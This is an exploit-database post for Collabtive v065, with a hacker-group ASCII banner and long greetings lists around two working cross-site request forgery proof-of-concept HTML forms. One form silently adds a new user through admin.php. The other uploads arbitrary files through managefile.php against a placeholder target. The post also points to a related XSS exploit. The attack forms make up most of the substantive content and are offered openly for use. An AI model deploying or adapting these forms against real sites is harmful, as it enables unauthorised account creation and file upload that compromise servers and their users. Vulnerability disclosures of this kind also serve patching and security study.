Collabtive v065 Multiple (CSRF/XSRF) Vulnerabilities

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Collabtive v065 Multiple (CSRF/XSRF) Vulnerabilities
# Author : KedAns-Dz
# E-mail : [email protected] ([email protected]) | [email protected]
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page : twitter.com/kedans
# platform : php
# Impact : Multiple Cross-Site { Request Forgery & Scripting }
# Tested on : [Windows XP sp3 FR] & [Linux.(Ubuntu 10.10) En] & [Mac OS X 10.6.1] & [BSDi-BSD/OS 4.2]
###
# xXx < Greetings to 'indoushka' at the Jail ... and to his mother 'Rebbi Ya3tik eSber' > xXx
###

# (!) Exploits :

#==(1)=======[ (CSRF) Add New User :]===========>

<div class="block_in_wrapper">
<h1> (CSRF) Add NeW User :</h1>
<form class="main" method="post" action="http://[target]/admin.php?action=adduser" onsubmit="return validateCompleteForm(this);">
<fieldset>
<div class="row"><label for="name">Username :</label><input type="text" name="name" id="name"/></div>
<div class="row"><label for="email">E-mail :</label><input type="text" name="email" id="email"/></div>
<div class="row"><label for="pass">Password :</label><input type="text" name="pass" id="pass"/></div>
<div class="row"><label id = "rate">Rate:</label><input type = "text" name ="rate" id ="rate"/></div>
<div class="butn"><button type="submit">Add New User</button></div>
</fieldset></form>
</div>

#==(2)=======[ (CSRF) Upload Arbitrary File :]===========>

<div class="block_in_wrapper">
<h2>(CSRF) Add & Upload Arbitrary File :</h2>
<form class="main" action="http://[target]/managefile.php?action=upload&id=93" method="post" enctype="multipart/form-data" onsubmit="return validateCompleteForm(this,'input_error');">
<fieldset>
<div class="row">
<label for = "numfiles">Count :</label>
<select name = "numfiles" id = "numfiles" onchange = "make_inputs(this.value);">
<option value = "1" selected="selected">1</option>
<option value = "2">2</option>
<option value = "3">3</option>
<option value = "4">4</option>
<option value = "5">5</option>
<option value = "6">6</option>
<option value = "7">7</option>
<option value = "8">8</option>
<option value = "9">9</option>
<option value = "10">10</option>
</select></div>
<div class = "row">
<label for = "upfolder">Folder :</label>
<select name = "upfolder" id = "upfolder">
<option value = "">/</option></select></div>
<div id = "inputs">
<div class="row"><label for = "title">Title :</label>
<input type = "text" name = "userfile1-title" id="title" /></div>
<div class="row"><label for="file">File :</label>
<div class="fileinput" ><input type="file" class="file" name="userfile1" id="filer" onchange = "file.value = this.value;" />
</table></div></div>
<div class="row"><label for = "tags">Tags :</label>
<input type = "text" name = "userfile1-tags" id="tags" /></div>
<button type="submit" onfocus="this.blur();">Upload File</button>
<button onclick="blindtoggle('form_file');toggleClass('addfile','addfile-active','addfile');toggleClass('add_file_butn','butn_link_active','butn_link');toggleClass('sm_files','smooth','nosmooth');return false;" onfocus="this.blur();">Cancel</button>
</div>
</fieldset></form>
</div>

>>>>>>>[ Edit User & Remote XSS (by AnatoliaSecurity) ]>>>>

+> References : [http://www.anatoliasecurity.com/exploits/collabtive-csrf-xploit.txt]

# (^_^) ! Good Luck ALL ...

#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > Islampard + Z4k1-X-EnG + Dr.Ride
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r 'www.1337day.com/team' ++ .... * Str0ke
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto.me) * PaCketStorm Team (www.packetstormsecurity.org)
# www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs ...
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever 
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================



#  0day.today [2018-04-06]  #